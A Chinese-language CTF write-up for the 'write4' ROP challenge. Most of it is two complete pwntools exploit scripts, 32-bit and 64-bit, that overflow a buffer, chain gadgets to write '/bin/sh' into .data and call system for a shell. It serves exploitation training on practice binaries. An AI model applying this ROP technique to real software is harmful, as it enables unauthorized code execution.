write4

write432：

同样的溢出点，但是这次没有/bin/sh，需要我们自己写到data中或者bss 中，两种写法没什么不同，就改个地址而已，这里就只说写到data段中，“/bin/sh"在32位中需要分两次写到 data 中去，用ROPgadget 查找可用的gadget 先：

image.png

这里用到 
0x08048670 : mov dword ptr [edi], ebp ; ret
0x080486da : pop edi ; pop ebp ; ret

exp :

# -*- coding:UTF-8 -*-
from pwn import *
sh = process('./write432')
data_addr = 0x0804A028    #写入到 data 段
# bss_addr = 0x0804A040    #写入到 bss 段
system_ply = 0x08048430
pop_edi_ebp = 0x080486da
mov_edi_ebp = 0x08048670
payload = ""
payload += 0x28 * "A" + p32(0)
payload += p32(pop_edi_ebp)
# payload += p32(bss_addr)
payload += p32(data_addr)
payload += "/bin"
payload += p32(mov_edi_ebp)
payload += p32(pop_edi_ebp)
# payload += p32(bss_addr + 4)
payload += p32(data_addr + 4)
payload += "/sh\x00"
payload += p32(mov_edi_ebp)
payload += p32(system_ply)
payload += p32(0)
# payload += p32(bss_addr)
payload += p32(data_addr)
sh.sendline(payload)
sh.interactive()

write4:
一样的思路，只不过在写入data的时候64位可以一次写入

# -*- coding:UTF-8 -*-
from pwn import *
sh = process('./write4')
# bss_addr = 0x0000000000601060     #写入到 bss 段
data_addr = 0x0000000000601050    #写入到 data 段
mov_r14_r15 = 0x0000000000400820
pop_r14_r15 = 0x0000000000400890
system_plt = 0x00000000004005E0
pop_rdi = 0x0000000000400893
payload = ""
payload += 0x20 * "A" + p64(0)
payload += p64(pop_r14_r15)
payload += p64(data_addr)
# payload += p64(bss_addr)
payload += "/bin/sh\x00"
payload += p64(mov_r14_r15)
payload += p64(pop_rdi)
# payload += p64(bss_addr)
payload += p64(data_addr)
payload += p64(system_plt)
sh.sendline(payload)
sh.interactive()